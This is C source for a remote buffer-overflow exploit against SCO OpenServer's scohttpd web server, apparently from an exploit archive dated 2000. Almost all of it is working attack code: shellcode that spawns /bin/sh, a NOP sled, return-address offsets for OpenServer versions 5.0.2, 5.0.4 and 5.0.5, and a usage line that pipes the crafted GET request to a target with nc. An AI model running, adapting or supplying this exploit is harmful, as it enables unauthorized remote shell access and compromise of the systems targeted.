/*
 * <scohttpx.c> Remote exploit
 *
 * Offset: /var/scohttp/scohttpd 
 * 0 -> OpenServer 5.0.4
 * 0 -> OpenServer 5.0.2
 * 600 -> OpenServer 5.0.5
 *
 * scosysv:~# /var/scohttp/scohttpd -v
 * scohttpd version NCSA/1.3.
 *
 * Usage: 
 * $ cc scohttpx.c -o scohttpx
 * $ (scohttpx 0;cat) | nc 1.1.1.1 457
 */ 

#include <stdlib.h>
#include <stdio.h>

char hell[]=
  "\xeb\x1b"       // start: jmp uno 
  "\x5e"           // dos: popl %esi
  "\x31\xdb"       // xorl %ebx,%ebx
  "\x89\x5e\x07"   // movb %bl,0x7(%esi)
  "\x89\x5e\x0c"   // movl %ebx,0x0c(%esi)
  "\x88\x5e\x11"   // movb %bl,0x11(%esi)
  "\x31\xc0"       // xorl %eax,%eax
  "\xb0\x3b"       // movb $0x3b,%al
  "\x8d\x7e\x07"   // leal 0x07(%esi),%edi
  "\x89\xf9"       // movl %edi,%ecx
  "\x53"           // pushl %ebx
  "\x51"           // pushl %ecx
  "\x56"           // pushl %esi
  "\x56"           // pushl %esi
  "\xeb\x10"       // jmp execve
  "\xe8\xe0\xff\xff\xff"          // uno: call dos
  "/bin/sh"
  "\xaa\xaa\xaa\xaa"
  "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 

#define OFF 0x803d688             // SCO OpenServer 5.0.4
#define ALINEA 3
#define LEN 400
                       
int main(int argc, char *argv[]) {
  int offset=0;
  char buf[LEN];
  int i;

  if(argc < 2) {
    printf("Usage: scohttpx <offset>\n");
    exit(0);
  }
  else {
    offset=atoi(argv[1]);
  }

  memset(buf,0x90,LEN);
  memcpy(buf+140,hell,strlen(hell));
  for(i=200+ALINEA;i<LEN-4;i+=4)
    *(int *)&buf[i]=OFF+offset;

  printf("GET ");

  for(i=0;i<LEN;i++)
    putchar(buf[i]);

  putchar('\n');
  exit(0);
}
/*                   www.hack.co.za   [26 September 2000]*/